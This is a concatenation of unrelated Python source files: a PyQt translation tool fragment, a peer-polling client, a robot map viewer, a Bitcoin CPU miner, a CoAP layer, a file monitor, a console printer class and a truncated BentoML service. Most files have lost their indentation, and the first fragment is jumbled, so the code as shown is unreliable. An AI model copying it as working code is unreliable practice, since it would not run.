selectedLanguage = self.comboFrom.currentText()
self.fromKey = self.dataLanguages[str(selectedLanguage)]
def selectResourceString(self):
in_path = QtGui.QFileDialog.getOpenFileName(self, u'Select string.xml resource', '')
fileName, fileExtension = os.path.splitext(str(in_path))
if fileExtension != '':
if str(fileExtension) != '.xml':
QtGui.QMessageBox.critical(self, u'System', u' Wrong file, the file should contain the XML extension.',QtGui.QMessageBox.Ok)
else:
self.lbProcess.setText(in_path)
self.btExportFile.setEnabled(False)
e = ImportData()
t = threading.Thread(target=e.importFile, args=(self, in_path, self.toKey), name='ServiceImport')
t.start()
def exportFile(self):
self.importEvo = True
engine = create_engine('sqlite:///data.sqlite',connect_args={'check_same_thread':True}, poolclass=StaticPool)
session = sessionmaker()
session.configure(bind=engine)
s = session()
language = ""
try:
ln = s.query(DataAccess.DataString.language_translation).first()
language = ln[0]
if language == '':
language = self.toKey
except Exception as e:
language = self.toKey
fileName = QFileDialog.getSaveFileName(self, 'Save as','strings-%s'%(language), selectedFilter='*.xml')
if fileName:
e = ExportData()
t = threading.Thread(target=e.exportToXMLFileString, args=(self, fileName, self.toKey), name='ServiceExportToXML')
t.start()
def loadLanguage(self):
gs = goslate.Goslate()
print gs.get_languages()
data = gs.get_languages()
count = 0
for string in data:
key = json.dumps(string)
key = key.split('"')
key = key[1]
language = gs.get_languages()[key]
self.dataLanguages[language] = key
#print count, language
#self.comboFrom.setItemText(count, _translate("MainWindow", key, None))
#self.comboFrom.addItem(_fromUtf8(language))
#self.comboTo.setItemText(count, _translate("MainWindow", key, None))
self.comboTo.addItem(_fromUtf8(language))
count += 1
import json
import DataAccess
from Import import ImportData
from xml.dom import minidom
import wx
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
sits = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(sits)
ui.loadLanguage()
sits.show()
sys.exit(app.exec_())
|
client.py
|
# Author: Ernests
import requests
import time
import json
import threading
from sensible.database import insertOtherData
def runClient(lock, otherData, clientLog, deviceAddress, addresses, **kwargs):
threading.Thread(target=clientLoop, args=(lock, otherData, clientLog, deviceAddress, addresses)).start()
def clientLoop(lock, otherData, clientLog, deviceAddress, addresses):
peersLastRequested = {}
session = requests.Session()
session.trust_env = False
while True:
# Can try put each of these requests in a separate thread.
for peer in addresses:
try:
timePreviousRequest = peersLastRequested[peer] if peer in peersLastRequested.keys() else 0
msg = { "lastRequest": timePreviousRequest }
msg = json.dumps(msg)
# perhaps a lock here
timeCurrentRequest = time.time()
# r = session.prepare_request(requests.Request('POST', peer, data=msg, timeout=2))
r = session.post(peer, data=msg, timeout=2)
clientLog.append(f'Sent to: {peer}, code {r.status_code}')
otherData = storeData(deviceAddress, peer, otherData, r.json())
peersLastRequested[peer] = timeCurrentRequest
except requests.exceptions.RequestException as e:
clientLog.append(f'Connection failed to: {peer}')
time.sleep(2)
def storeData(deviceAddress, peer, collected, new):
if peer not in collected:
collected[peer] = {}
for i in new:
if i in collected[peer]:
collected[peer][i].extend(new[i])
else:
collected[peer][i] = new[i]
for data in new[i]:
insertOtherData(deviceAddress, peer, i, data['data'], data['timestamp'])
return collected
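# --- Hedged usage sketch (not part of the original module) ---
# A minimal illustration of how runClient might be started. The peer URL and
# device identifier below are hypothetical placeholders, not values from the
# original project. runClient spawns clientLoop on a background thread that
# polls each peer every 2 seconds and aggregates the JSON payloads it receives.
if __name__ == "__main__":
    lock = threading.Lock()            # shared lock (currently unused inside the loop)
    otherData = {}                     # data collected from peers, keyed by peer URL
    clientLog = []                     # human-readable log of request outcomes
    deviceAddress = "device-01"        # hypothetical identifier for this device
    addresses = ["http://192.168.0.10:5000/data"]  # hypothetical peer endpoint(s)
    runClient(lock, otherData, clientLog, deviceAddress, addresses)
    # The polling loop runs until the process is killed (the thread is not a daemon).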
|
show_map.py
|
from PIL import Image
import threading
import matplotlib
import time
import numpy as np
from logging import getLogger
logger = getLogger('show_map')
class ShowMap:
"""
Class that implements the ShowMap object.
"""
def __init__(self, grid, show_gui = True, save_map_time = 5, name = 'map.png'):
"""
Instantiates a ShowMap.
:param grid: The grid of the environment with certainty values.
:type grid: 2D Numpy array
:param show_gui: True if we want to show the gui, False otherwise.
:type show_gui: boolean
:param save_map_time: Delay between each save of the map.
:type save_map_time: float
:param name: Name of the map file.
:type name: string
"""
if not show_gui:
matplotlib.use('Agg')
import matplotlib.pyplot as plt
self.__save_map_time = save_map_time
self.__name = name
self.__image = Image.fromarray(np.transpose(grid) * 255)
w, h = self.__image.size
plt.rcParams['toolbar'] = 'None'
self.__fig, self.__ax = plt.subplots(1, 1)
self.__fig.suptitle(self.__name)
self.__ax.set_xticks([])
self.__ax.set_yticks([])
self.__implot = self.__ax.imshow(self.__image)
plt.show(block=False)
self.__fig.canvas.draw()
self.__save()
self.__start_time = time.time()
def update(self, map_to_display, robot_cell, frontiers = None, forces = None, path = None):
"""
Function that updates the gui.
:param map_to_display: The map of the environment to display.
:type map_to_display: Map
:param robot_cell: The cell of the robot in the grid.
:type robot_cell: Position
:param frontiers: The frontiers.
:type frontiers: A list of Position objects.
:param forces: The forces.
:type forces: A dictionary of dictionaries representing vectors.
:param path: The path.
:type path: A list of Position objects.
"""
import matplotlib.pyplot as plt
plt.pause(0.02)
grid = np.matrix(map_to_display.grid)
for x in range(map_to_display.grid_width):
for y in range(map_to_display.grid_height):
value = grid[x, y]
self.__image.putpixel((x, map_to_display.grid_height - 1 - y), abs(255 - (value * 255)))
self.__ax.clear()
self.__implot = self.__ax.imshow(self.__image)
self.__ax.set_xticks([])
self.__ax.set_yticks([])
self.__ax.plot(robot_cell.x, map_to_display.grid_height - 1 - robot_cell.y, 'rs', markersize=3)
if forces != None:
y = map_to_display.grid_height - 1 - robot_cell.y
if forces['rep_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['rep_force']['x'], -forces['rep_force']['y'], head_width=1, head_length=2, fc='r', ec='r')
if forces['attr_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['attr_force']['x'], -forces['attr_force']['y'], head_width=1, head_length=2, fc='g', ec='g')
if forces['gen_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['gen_force']['x'], -forces['gen_force']['y'], head_width=1, head_length=2, fc='m', ec='m')
if path != None:
for i in range(len(path)):
self.__ax.plot(path[i].x, map_to_display.grid_height - 1 - path[i].y, 'bh', markersize=4 if i < len(path) - 1 else 8)
if frontiers != None:
index = 0
for frontier in frontiers:
for point in frontier:
color = ['gh', 'ch', 'mh', 'yh', 'kh']
self.__ax.plot(point.x, map_to_display.grid_height - 1 - point.y, color[index % 5], markersize=1)
index += 1
self.__fig.canvas.draw()
elapsed_time = time.time() - self.__start_time
if elapsed_time >= self.__save_map_time:
self.__save()
self.t = threading.Thread(target=self.__save, args=())
self.t.start()
self.__start_time = time.time()
def __save(self):
"""
Function that saves the map to a file.
"""
        data = np.frombuffer(self.__fig.canvas.tostring_rgb(), dtype=np.uint8)
data = data.reshape(self.__fig.canvas.get_width_height()[::-1] + (3,))
img = Image.fromarray(data)
img.convert('RGB').save(self.__name, "PNG")
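# --- Hedged usage sketch (not part of the original module) ---
# A minimal illustration of constructing ShowMap with an occupancy grid of
# certainty values in [0, 1]; the grid dimensions and file name are arbitrary
# assumptions. update() additionally expects a map object exposing .grid,
# .grid_width and .grid_height plus a robot cell with .x/.y attributes, which
# are project-specific types not shown here.
if __name__ == "__main__":
    unknown_grid = np.ones((60, 40)) * 0.5   # 0.5 = completely unknown cells
    show_map = ShowMap(unknown_grid, show_gui=False, save_map_time=5, name='demo_map.png')
    # With show_gui=False the matplotlib 'Agg' backend is used and the map is
    # written to 'demo_map.png' at construction and on subsequent update() calls.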
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 12221
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
coap.py
|
import logging
import logging.config
import random
import socket
import threading
from coapthon.messages.message import Message
from coapthon.messages.response import Response
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.request import Request
from coapthon.serializer import Serializer
import os.path
__author__ = 'giacomo'
logger = logging.getLogger(__name__)
class CoAP(object):
def __init__(self, server, starting_mid, callback):
self._currentMID = starting_mid
self._server = server
self._callback = callback
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
# try:
# # legal
# socket.inet_aton(server[0])
# except socket.error:
# # Not legal
# data = socket.getaddrinfo(server[0], server[1])
# self._server = (data[0], data[1])
host, port = self._server
addrinfo = socket.getaddrinfo(host, None)[0]
if addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.daemon = True
self._receiver_thread.start()
@property
def current_mid(self):
return self._currentMID
@current_mid.setter
def current_mid(self, c):
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
self.send_datagram(transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
def send_datagram(self, message):
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
logger.debug("retransmit Request")
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def receive_datagram(self):
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except socket.error: # pragma: no cover
return
else: # pragma: no cover
if len(datagram) == 0:
print 'orderly shutdown on server end'
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
transaction = self._messageLayer.send_request(transaction.request)
self.send_datagram(transaction.request)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
# Handle separate
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
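# --- Hedged usage sketch (not part of the original module) ---
# A rough illustration of driving this client-side CoAP layer directly, similar
# to what coapthon's HelperClient does. The server address and resource path
# are illustrative assumptions, a CoAP server is assumed to be listening there,
# and the callback receives every deserialized response.
if __name__ == "__main__":
    def handle_response(response):
        # Invoked from the receiver thread for each incoming response.
        print("Response payload: %s" % response.payload)
    server = ("127.0.0.1", 5683)                 # assumed CoAP server address
    protocol = CoAP(server, random.randint(1, 65535), handle_response)
    request = Request()
    request.destination = server
    request.type = defines.Types["CON"]
    request.code = defines.Codes.GET.number
    request.uri_path = "basic"                   # assumed resource path
    protocol.send_message(request)
    import time                                  # not imported at module level above
    time.sleep(2)                                # give the receiver thread time to collect the reply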
|
file_monitor.py
|
# Copyright 2017 Tufin Technologies Security Suite. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import pyinotify
import logging
import atexit
from abc import abstractmethod
from pytos.common.logging.definitions import COMMON_LOGGER_NAME
logger = logging.getLogger(COMMON_LOGGER_NAME)
class ModifiedFileEventHandler(pyinotify.ProcessEvent):
def my_init(self, callback=None):
self._callback = callback
def process_IN_CLOSE_WRITE(self, event):
self._callback()
def process_IN_MODIFY(self, event):
self._callback()
class FileMonitor:
FILE_CHANGE_MASK = pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MODIFY
def __init__(self, file_paths, watch_mask=FILE_CHANGE_MASK):
self.inotify_watch_manager = pyinotify.WatchManager()
self._file_paths = file_paths
self._event_handler = ModifiedFileEventHandler(callback=self._reload_modified_file)
self._inotify_notifier = pyinotify.Notifier(self.inotify_watch_manager, default_proc_fun=self._event_handler)
self._loop_thread = threading.Thread(target=self._inotify_notifier.loop, daemon=True)
for file_path in self._file_paths:
self.inotify_watch_manager.add_watch(file_path, watch_mask)
self._loop_thread.start()
atexit.register(self._shutdown)
def _shutdown(self):
for watch in self.inotify_watch_manager.watches.copy():
self.inotify_watch_manager.del_watch(watch)
self._inotify_notifier.stop()
self._loop_thread.join(0.1)
def __del__(self):
self._shutdown()
@abstractmethod
def _reload_modified_file(self, *args, **kwargs):
raise NotImplementedError
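# --- Hedged usage sketch (not part of the original module) ---
# FileMonitor is abstract: subclasses must implement _reload_modified_file,
# which pyinotify invokes whenever one of the watched files is written to or
# modified. The watched path below is an illustrative assumption.
class ConfigFileMonitor(FileMonitor):
    def _reload_modified_file(self, *args, **kwargs):
        # Re-read the configuration here; this sketch only logs the event.
        logger.info("Watched configuration file changed, reloading.")
# Example: monitor = ConfigFileMonitor(["/etc/example/app.conf"])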
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
if colors:
self.colors.update(colors)
if icons:
self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
spaced (bool): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
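# Usage sketch (not part of the original module; illustrative only, based on the
# Printer API defined above):
#     msg = Printer(line_max=76)
#     msg.divider("Results")
#     msg.good("Training complete", "All checkpoints saved.")
#     msg.warn("Low disk space")
#     msg.table({"epochs": 10, "accuracy": 0.93}, title="Summary")
#     print(msg.counts)  # Counter of how often good/fail/warn/info fired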
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
import aiohttp.web
import psutil
from dependency_injector.wiring import Provide, inject
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.saved_bundle.config import DEFAULT_MAX_BATCH_SIZE, DEFAULT_MAX_LATENCY
from bentoml.tracing import get_tracer
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[BentoMLContainer.config.instrument.namespace],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of HTTP requests',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_route = request.match_info.get("path", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_route, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
